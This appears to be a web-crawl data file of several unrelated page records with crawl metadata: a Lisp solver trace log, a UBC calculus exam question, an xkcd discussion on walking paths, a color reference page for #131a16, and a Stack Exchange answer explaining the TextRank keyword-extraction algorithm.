values.\nRemoved 0 of 55 keys.\nRemoved 0 dominated and equivalent values.\nwith keys (\"OIS\" \"BOR\" \"RZ\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 3 of 3 new partial solutions.\nwith keys (\"SCH\" \"HN\")\nto 3 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"JI\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 6 of 6 new partial solutions.\nwith keys (\"TERS\" \"ETT\")\nto 6 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 12 new partial solutions.\nwith keys (\"CHI\")\nto 12 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 12 of 12 new partial solutions.\nwith keys (\"S F\" \"DES\" \" DE\" \"IER\" \"FL\" \"VI\")\nto 12 partial solutions.\nDeleting 8 equivalent partial solutions.\nRemoving 8 dominated solutions.\nReturning 56 of 72 new partial solutions.\nwith keys (\"EKI\")\nto 56 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 56 of 56 new partial solutions.\nwith keys (\" MAL\" \"OIS\" \"LG\")\nto 56 partial solutions.\nDeleting 96 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 72 of 168 new partial solutions.\nwith keys (\"TERS\" \"D P\")\nto 72 partial solutions.\nDeleting 108 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 144 new partial solutions.\nwith keys (\"W \")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"DS\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"BOR\" \" DE\" \"GU\")\nto 36 partial solutions.\nDeleting 88 equivalent partial solutions.\nRemoving 2 dominated solutions.\nReturning 18 of 108 new partial solutions.\nwith keys (\"ANS\" \"LM\")\nto 18 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\"LH\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 36 of 36 new partial solutions.\nwith keys (\" COR\" \"ORS\")\nto 36 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 72 of 72 new partial solutions.\nwith keys (\" MAL\" \"TES\" \"LAS\" \"KA\")\nto 72 partial solutions.\nDeleting 184 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 104 of 288 new partial solutions.\nwith keys (\"IP\")\nto 104 partial solutions.\nDeleting 0 equivalent partial solutions.\n;GC #199: took: 0.20 (1%) CPU time, 0.10 (1%) real time; free: 16754359\nRemoving 0 dominated solutions.\nReturning 104 of 104 new partial solutions.\nwith keys (\"SHI\" \" I\")\nto 104 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 208 of 208 new partial solutions.\nwith keys (\"AK\")\nto 208 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 208 of 208 new partial solutions.\nwith keys (\"DES\" \"DG\" \"OD\")\nto 208 partial solutions.\nDeleting 304 equivalent partial solutions.\nRemoving 144 dominated solutions.\nReturning 176 of 624 new partial solutions.\nwith keys (\"S F\" \"FR\")\nto 176 partial solutions.\nDeleting 224 equivalent partial solutions.\nRemoving 16 dominated solutions.\nReturning 112 of 352 new partial solutions.\nwith keys (\"API\")\nto 112 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 112 of 112 new partial solutions.\nwith keys (\"IES\")\nto 112 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 112 of 112 new partial solutions.\nwith keys (\"LAS\" \"IZ\" \"VI\")\nto 112 partial solutions.\n;GC #200: took: 0.10 (0%) CPU time, 0.10 (1%) real time; free: 16757322\nDeleting 272 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 336 new partial solutions.\nwith keys (\"ITT\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"GS\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"HAVANE\")\nto 64 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 64 of 64 new partial solutions.\nwith keys (\"ANI\" \"LS\")\nto 64 partial solutions.\nDeleting 80 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 48 of 128 new partial solutions.\nwith keys (\"FS\")\nto 48 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 48 of 48 new partial solutions.\nwith keys (\"TES\" \"LT\")\nto 48 partial solutions.\nDeleting 72 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 24 of 96 new partial solutions.\nwith keys (\" COR\" \"LS\")\nto 24 partial solutions.\nDeleting 32 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 16 of 48 new partial solutions.\nwith keys (\"IER\" \" T\")\nto 16 partial solutions.\nDeleting 24 equivalent partial solutions.\nRemoving 4 dominated solutions.\nReturning 4 of 32 new partial solutions.\nwith keys (\"ANS\" \"ANI\")\nto 4 partial solutions.\nDeleting 6 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 2 of 8 new partial solutions.\nwith keys (\"GR\")\nto 2 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 2 of 2 new partial solutions.\nwith keys (\"SCH\" \" PI\")\nto 2 partial solutions.\nDeleting 3 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 4 new partial solutions.\nwith keys (\"SHI\" \" T\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"EI\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 1 new partial solutions.\nwith keys (\"DL\" \"OD\")\nto 1 partial solutions.\nDeleting 1 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 2 new partial solutions.\nwith keys (\"OX\")\nto 1 partial solutions.\nDeleting 0 equivalent partial solutions.\nRemoving 0 dominated solutions.\nReturning 1 of 1 new partial solutions." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74696696,"math_prob":0.93043756,"size":33449,"snap":"2022-27-2022-33","text_gpt3_token_len":9371,"char_repetition_ratio":0.3500673,"word_repetition_ratio":0.30507734,"special_character_ratio":0.30123472,"punctuation_ratio":0.10986267,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9925551,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T19:29:37Z\",\"WARC-Record-ID\":\"<urn:uuid:92092e87-48c2-4081-8938-8e5920abb7ba>\",\"Content-Length\":\"175184\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68387e35-2151-4361-ab6e-a0702472fb3d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f5c12f0b-ac84-4016-8fdc-adff5dbadb28>\",\"WARC-IP-Address\":\"142.251.16.132\",\"WARC-Target-URI\":\"https://funcall.blogspot.com/2014/08/\",\"WARC-Payload-Digest\":\"sha1:MB73OCTHKI7N47R3SYHMUEHYW3EFJTCQ\",\"WARC-Block-Digest\":\"sha1:6ER7YOADPQLBTPRX3G5GRH5QUFTJKOM5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103642979.38_warc_CC-MAIN-20220629180939-20220629210939-00592.warc.gz\"}"}
https://wiki.ubc.ca/Science:Math_Exam_Resources/Courses/MATH100/December_2016/Question_04_(c)
[ "# Science:Math Exam Resources/Courses/MATH100/December 2016/Question 04 (c)\n\nMATH100 December 2016\nOther MATH100 Exams\n\n### Question 04 (c)\n\nLet $f(x)$", null, "be a continuous function defined for all real numbers $x$", null, ".\n\nSuppose $f(x)$", null, "is increasing on the intervals $(-\\infty ,-1)$", null, "and $(3,\\infty )$", null, ", decreasing on $(-1,3)$", null, ", $f(-1)=2$", null, "and $f(3)=1$", null, ".\n\nHow many zeroes does $f(x)$", null, "have?\n\n(i) 0\n\n(ii) 1\n\n(iii) 2\n\n(iv) 3\n\n(v) Cannot determine from the information given.\n\n Make sure you understand the problem fully: What is the question asking you to do? Are there specific conditions or constraints that you should take note of? How will you know if your answer is correct from your work only? Can you rephrase the question in your own words in a way that makes sense to you? If you are stuck, check the hint below. Consider it for a while. Does it give you a new idea on how to approach the problem? If so, try it!\n\n Checking a solution serves two purposes: helping you if, after having used the hint, you still are stuck on the problem; or if you have solved the problem and would like to check your work. If you are stuck on a problem: Read the solution slowly and as soon as you feel you could finish the problem on your own, hide it and work on the problem. Come back later to the solution if you are stuck or if you want to check your work. If you want to check your work: Don't only focus on the answer, problems are mostly marked for the work you do, make sure you understand all the steps that were required to complete the problem and see if you made mistakes or forgot some aspects. Your goal is to check that your mental process was correct, not only the result.", null, "Math Learning Centre A space to study math together. Free math graduate and undergraduate TA support. Mon - Fri: 11 am - 5 pm, Private tutor We can help to" ]
[ null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/87f9e315fd7e2ba406057a97300593c4802b53e4", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/eecbbaf03fa846f2e0c57bf5f65e760d2f7e484d", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/d6b7cc6628a02aefb227ffb28187b41371d6ac22", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/d9d16379ad1374665a70318fffffa4c02815d901", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/4bcbd3a30f5fce96554fb61098f98023e4b472fe", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/fa5d5faad6da6fee29461116087648839b9196b1", null, "https://wiki.ubc.ca/api/rest_v1/media/math/render/svg/202945cce41ecebb6f643f31d119c514bec7a074", null, "https://wiki.ubc.ca/images/thumb/6/60/Bulbgraph.png/25px-Bulbgraph.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83132666,"math_prob":0.9137497,"size":1777,"snap":"2019-51-2020-05","text_gpt3_token_len":576,"char_repetition_ratio":0.15848844,"word_repetition_ratio":0.0,"special_character_ratio":0.3545301,"punctuation_ratio":0.09315068,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9784589,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,1,null,1,null,1,null,1,null,3,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-24T18:09:04Z\",\"WARC-Record-ID\":\"<urn:uuid:abe27a30-7af6-41fd-9baa-e15bc8ab2c4f>\",\"Content-Length\":\"45011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:17b54a40-0ddf-44ab-b3ff-91e8af8123ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd99f21d-a640-4aca-8ea6-76e461a07a4c>\",\"WARC-IP-Address\":\"206.87.224.38\",\"WARC-Target-URI\":\"https://wiki.ubc.ca/Science:Math_Exam_Resources/Courses/MATH100/December_2016/Question_04_(c)\",\"WARC-Payload-Digest\":\"sha1:2ZUJ56XSWJEQQU7LFEVW4W7N6UI7TTG5\",\"WARC-Block-Digest\":\"sha1:Z5T5X2MIQAPVEACAQXTZYHTF7QBWH67T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250624328.55_warc_CC-MAIN-20200124161014-20200124190014-00521.warc.gz\"}"}
https://www.explainxkcd.com/wiki/index.php/Talk:85:_Paths
[ "# Talk:85: Paths\n\nThis is the kind of thing that comes up in story problems in Calculus often. If you can travel in/over one medium at one speed, and in/over another medium at a different speed, what is the optimum path to minimize your travel time.\nAn example of this problem would be if there is a drowning swimmer 100 meters offshore, you are 300 meters from the point on the shoreline closest to the swimmer, and you can run at 15mph and swim at 2mph, how far do you run along the shoreline before going into the water to get to the swimmer as quickly as possible?\nThe fact that Randall shows two different paths over the \"grass\" makes me think that he was thinking more along the line of obsessively optimizing his path rather than about whether it might be acceptable or not to walk over the grass. -- mwburden 70.91.188.49 21:23, 13 December 2012 (UTC)\n\nAlong similar lines, this mathematician's dog uses Calculus (albeit at an intuitive, rather than mathematical level) to optimize the path that it takes to retrieve the ball from the water. -- mwburden 70.91.188.49 21:27, 13 December 2012 (UTC)\n\nThis particular situation is less interesting, since the walker's speed is the same for all three paths! This is seen by the times being directly proportional to the distances. Normally, the off-normal-path is at a lower speed, but some shorter path still gives the smallest time.DrMath 08:22, 14 October 2013 (UTC)\n\nWhere do the equations come from to figure out #2 & #3 - can anybody derive it? 108.162.219.185 (talk) (please sign your comments with ~~~~)\n\nThe equation #2 comes from the second route. t(1+√2)/3 is how far the second path takes the guy. If each block is a unit square, the diagonal to the corner is √2 while the next part is 1. The t/3 part is making it comparable to the first one (the first one is t despite it being 3 unit squares). Equation #3 is t√(5)/3. Plugging 1, 2, and √5 into wolfram|alpha for triangle side lengths makes it a right triange, so the √5 comes from the side length (assuming unit squares) while the t/3 makes it comparable to the first one.Mulan15262 (talk) 02:36, 1 December 2014 (UTC)\n\nInterestingly enough, if the three sides are equal in time taken (20 seconds each), the time it would take for path #2 would be 20rt2 + 20, and path three would be roughly 40, which comes out to 60, 48.28, and 40 seconds by using very simple geometry. 108.162.237.179 (talk) (please sign your comments with ~~~~)\n\nBased on his times, it is two squares with the same side length. Base on that geometry, Path #2 will be the hypotenuse of a 45 degree right triangle. t = √(20^2 + 20^2) = 20 * √2 = 48.28. Path #3 would be t = √(20^2 + 40^2) = 20 * √5 = 44.72. Not sure where you got roughly 40 from. Were you thinking of the sin of 30 degree rule where the hypotenuse is double the opposite side? In this case, the adjacent is double the opposite which puts the hypotenuse at √5 times the opposite.Flewk (talk) 17:10, 24 December 2015 (UTC)\n\nShouldn't this be added to Time management category?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.96890754,"math_prob":0.973162,"size":3023,"snap":"2019-26-2019-30","text_gpt3_token_len":823,"char_repetition_ratio":0.095395826,"word_repetition_ratio":0.014678899,"special_character_ratio":0.2980483,"punctuation_ratio":0.11490683,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98859507,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-23T01:46:03Z\",\"WARC-Record-ID\":\"<urn:uuid:9ee8b080-acce-4b47-9b7b-51ef244db1fe>\",\"Content-Length\":\"23145\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:32854d79-2c07-4280-98f6-0e35c41ae13b>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd791bbc-a0fe-43ec-acf3-0116a97bfd5d>\",\"WARC-IP-Address\":\"104.28.22.60\",\"WARC-Target-URI\":\"https://www.explainxkcd.com/wiki/index.php/Talk:85:_Paths\",\"WARC-Payload-Digest\":\"sha1:MFZJMYQP6YJKWQNVHZOCQJYHM33JZUOG\",\"WARC-Block-Digest\":\"sha1:UGPOBX6JNVEMPIAMMFN72I5775HNYGQU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195528635.94_warc_CC-MAIN-20190723002417-20190723024417-00296.warc.gz\"}"}
https://www.colorhexa.com/131a16
[ "# #131a16 Color Information\n\nIn a RGB color space, hex #131a16 is composed of 7.5% red, 10.2% green and 8.6% blue. Whereas in a CMYK color space, it is composed of 26.9% cyan, 0% magenta, 15.4% yellow and 89.8% black. It has a hue angle of 145.7 degrees, a saturation of 15.6% and a lightness of 8.8%. #131a16 color hex could be obtained by blending #26342c with #000000. Closest websafe color is: #003300.\n\n• R 7\n• G 10\n• B 9\nRGB color chart\n• C 27\n• M 0\n• Y 15\n• K 90\nCMYK color chart\n\n#131a16 color description : Very dark (mostly black) cyan - lime green.\n\n# #131a16 Color Conversion\n\nThe hexadecimal color #131a16 has RGB values of R:19, G:26, B:22 and CMYK values of C:0.27, M:0, Y:0.15, K:0.9. Its decimal value is 1251862.\n\nHex triplet RGB Decimal 131a16 `#131a16` 19, 26, 22 `rgb(19,26,22)` 7.5, 10.2, 8.6 `rgb(7.5%,10.2%,8.6%)` 27, 0, 15, 90 145.7°, 15.6, 8.8 `hsl(145.7,15.6%,8.8%)` 145.7°, 26.9, 10.2 003300 `#003300`\nCIE-LAB 8.439, -4.311, 1.702 0.783, 0.935, 0.898 0.299, 0.357, 0.935 8.439, 4.635, 158.46 8.439, -2.082, 1.368 9.67, -2.475, 1.262 00010011, 00011010, 00010110\n\n# Color Schemes with #131a16\n\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1a1317\n``#1a1317` `rgb(26,19,23)``\nComplementary Color\n• #141a13\n``#141a13` `rgb(20,26,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #131a1a\n``#131a1a` `rgb(19,26,26)``\nAnalogous Color\n• #1a1314\n``#1a1314` `rgb(26,19,20)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1a131a\n``#1a131a` `rgb(26,19,26)``\nSplit Complementary Color\n• #1a1613\n``#1a1613` `rgb(26,22,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #16131a\n``#16131a` `rgb(22,19,26)``\n• #171a13\n``#171a13` `rgb(23,26,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #16131a\n``#16131a` `rgb(22,19,26)``\n• #1a1317\n``#1a1317` `rgb(26,19,23)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #080b0a\n``#080b0a` `rgb(8,11,10)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1e2922\n``#1e2922` `rgb(30,41,34)``\n• #29372f\n``#29372f` `rgb(41,55,47)``\n• #33463b\n``#33463b` `rgb(51,70,59)``\nMonochromatic Color\n\n# Alternatives to #131a16\n\nBelow, you can see some colors close to #131a16. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #131a14\n``#131a14` `rgb(19,26,20)``\n• #131a15\n``#131a15` `rgb(19,26,21)``\n• #131a15\n``#131a15` `rgb(19,26,21)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #131a17\n``#131a17` `rgb(19,26,23)``\n• #131a17\n``#131a17` `rgb(19,26,23)``\n• #131a18\n``#131a18` `rgb(19,26,24)``\nSimilar Colors\n\n# #131a16 Preview\n\nThis text has a font color of #131a16.\n\n``<span style=\"color:#131a16;\">Text here</span>``\n#131a16 background color\n\nThis paragraph has a background color of #131a16.\n\n``<p style=\"background-color:#131a16;\">Content here</p>``\n#131a16 border color\n\nThis element has a border color of #131a16.\n\n``<div style=\"border:1px solid #131a16;\">Content here</div>``\nCSS codes\n``.text {color:#131a16;}``\n``.background {background-color:#131a16;}``\n``.border {border:1px solid #131a16;}``\n\n# Shades and Tints of #131a16\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #020303 is the darkest color, while #f7f9f8 is the lightest one.\n\n• #020303\n``#020303` `rgb(2,3,3)``\n• #0b0f0c\n``#0b0f0c` `rgb(11,15,12)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1b2520\n``#1b2520` `rgb(27,37,32)``\n• #243129\n``#243129` `rgb(36,49,41)``\n• #2c3c33\n``#2c3c33` `rgb(44,60,51)``\n• #34473c\n``#34473c` `rgb(52,71,60)``\n• #3c5346\n``#3c5346` `rgb(60,83,70)``\n• #455e50\n``#455e50` `rgb(69,94,80)``\n• #4d6959\n``#4d6959` `rgb(77,105,89)``\n• #557563\n``#557563` `rgb(85,117,99)``\n• #5e806c\n``#5e806c` `rgb(94,128,108)``\n• #668b76\n``#668b76` `rgb(102,139,118)``\n• #6f9680\n``#6f9680` `rgb(111,150,128)``\n• #7a9e8a\n``#7a9e8a` `rgb(122,158,138)``\n• #86a694\n``#86a694` `rgb(134,166,148)``\n• #91af9e\n``#91af9e` `rgb(145,175,158)``\n• #9cb7a8\n``#9cb7a8` `rgb(156,183,168)``\n• #a8bfb2\n``#a8bfb2` `rgb(168,191,178)``\n• #b3c7bc\n``#b3c7bc` `rgb(179,199,188)``\n• #bed0c6\n``#bed0c6` `rgb(190,208,198)``\n``#cad8d0` `rgb(202,216,208)``\n• #d5e0da\n``#d5e0da` `rgb(213,224,218)``\n• #e0e9e4\n``#e0e9e4` `rgb(224,233,228)``\n• #ecf1ee\n``#ecf1ee` `rgb(236,241,238)``\n• #f7f9f8\n``#f7f9f8` `rgb(247,249,248)``\nTint Color Variation\n\n# Tones of #131a16\n\nA tone is produced by adding gray to any pure hue. In this case, #161716 is the less saturated color, while #022b14 is the most saturated one.\n\n• #161716\n``#161716` `rgb(22,23,22)``\n• #151816\n``#151816` `rgb(21,24,22)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #111c16\n``#111c16` `rgb(17,28,22)``\n• #101d16\n``#101d16` `rgb(16,29,22)``\n• #0e1f15\n``#0e1f15` `rgb(14,31,21)``\n• #0c2115\n``#0c2115` `rgb(12,33,21)``\n• #0a2315\n``#0a2315` `rgb(10,35,21)``\n• #092415\n``#092415` `rgb(9,36,21)``\n• #072614\n``#072614` `rgb(7,38,20)``\n• #052814\n``#052814` `rgb(5,40,20)``\n• #032a14\n``#032a14` `rgb(3,42,20)``\n• #022b14\n``#022b14` `rgb(2,43,20)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #131a16 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56292254,"math_prob":0.8194501,"size":3679,"snap":"2023-14-2023-23","text_gpt3_token_len":1680,"char_repetition_ratio":0.13170068,"word_repetition_ratio":0.010989011,"special_character_ratio":0.5702637,"punctuation_ratio":0.23678415,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99201626,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-23T16:35:06Z\",\"WARC-Record-ID\":\"<urn:uuid:64d39d84-7d3f-45d4-937b-fe1258e8abcf>\",\"Content-Length\":\"36103\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6fac5731-ddbf-4d61-ace0-af0b6b7d9947>\",\"WARC-Concurrent-To\":\"<urn:uuid:553ac223-6ffa-40b9-87c0-f63eaaf7893b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/131a16\",\"WARC-Payload-Digest\":\"sha1:6GNZI4NO66P2YO3CMYTVE6VHC3VJ2S7C\",\"WARC-Block-Digest\":\"sha1:TN2TA4PSMMO5WCXJP3HHJLIIFVRSPMER\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945182.12_warc_CC-MAIN-20230323163125-20230323193125-00753.warc.gz\"}"}
https://stats.stackexchange.com/questions/197072/how-does-textrank-differentiate-between-keywords-and-simply-frequent-words-such
[ "# How does TextRank differentiate between keywords and simply frequent words, such as “is”\n\nI am trying to understand how TextRank document summary algorithm works.\n\nA few articles that I've read so far introduce text rank as a modification of page rank (e.g. article in wikipedia). However, they don't clearly explain all nuances.\n\nTherefore, I have a few questions:\n\n1. When modelling each uni-gram as a vertex, would two identical words in different places be represented as same or different vertices? For example, if the text is:\n\nUsain Bolt is the fastest runner in the world.\n\n\nwould there be two vertices for word the, or just one?\n\n2. After calculating the limiting distribution (i.e rank) of every vertex, how do we merge several uni-grams with high rank into one? If the top 3 uni-grams are all far away from each other in the text, what would get merged with what?\n\n3. Words such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\n4. How is TextRank better than simply counting each keyword appearing in the text, and merging all words that have the highest count? (Assume that problem 3 is solved separately)\n\nThe first question:\n\nWhen modelling each uni-gram as a vertex, would two identical words in different places be represented as same or different vertices?\n\nIt will be represented as the same(just one). (In your example \"the\" will usually be dropped since it's a stop word). For illustration, please refer to this example from this paper. It is by treating them as the same to draw the edges between it and other different words.", null, "For the text:\n\nCompatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types systems and systems of mixed types.\n\nThe second question:\n\nAfter calculating the limiting distribution (i.e rank) of every vertex, how do we merge several uni-grams with high rank into one? If the top 3 uni-grams are all far away from each other in the text, what would get merged with what?\n\nOnly when they are connected to each other in the original text we should merge them. For instance in the aforementioned example, \"linear\" and \"system\" are concatenate in the text, so \"linear system\" will be treated as a phrase, provided only adj. and n. are considered in this context.\n\nQuestion 3:\n\nWords such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\nWords such as \"the\" and \"a\" or \"of\" will be deleted. Refer to here. However open class words, such as nouns, adjectives and etc. are important.\n\nThe last question:\n\nHow is TextRank better than simply counting each keyword appearing in the text, and merging all words that have the highest count? (Assume that problem 3 is solved separately).\n\nBy the word occurrence method:\n\nword_list = \"Compatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types systems and systems of mixed types.\"\nword_list = word_list.lower()\ntokenizer = RegexpTokenizer(r'\\w+')\ntokens = tokenizer.tokenize(word_list)\nword_list = [w for w in tokens if not w in stopwords.words('english')]\ndic = {i: b.count(i) for i in word_list}\nsorted_words = sorted(dic.items(), key=lambda x: x, reverse=True)\n\n\nWe can get the following result(a part):\n\n('systems', 4), ('set', 3), ('solutions', 3), ('minimal', 3), ('types', 3), ('linear', 2), ('algorithms', 2), ('constructing', 1), ('numbers.', 1), ('considered.', 1), ('equations,', 1), ('given.', 1), ('inequations,', 1), ('solving', 1), ('system', 1), ('compatibility', 1), ('strict', 1), ('criteria', 1), ('supporting', 1),\n\nIt's much bad than the result by the Textrank\n\nlinear constraints; linear diophantine equations; natural numbers; nonstrict inequations; strict inequations; upper bounds\n\nLet alone that by human:\n\nlinear constraints; linear diophantine equations; minimal generating sets; non−strict inequations; set of natural numbers; strict inequations; upper bounds\n\nAs we can see we lost the information given by the context, especially voting or recommendation by the core concept of the Pagerank algorithm. Every connection in a window is a voting for both of the words(in the undirected graph or Markov model).\n\nlerner already provided pretty comprehensive answer, but one technique he didn't mention that is useful in practice is using TF-IDF model.\n\nWords such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\nlerner already mentioned stopword filtering. In addition to that method modern implementations also use information from TF-IDF model. IDFs capture frequencies of words across documents. They naturally scale common words scores, thus making them count less in comparisons. Also they can be used for stopwords removal by thresholding (you can just drop words that occur in more than $n$ sentences)." ]
[ null, "https://i.stack.imgur.com/ohF5r.png", null ]
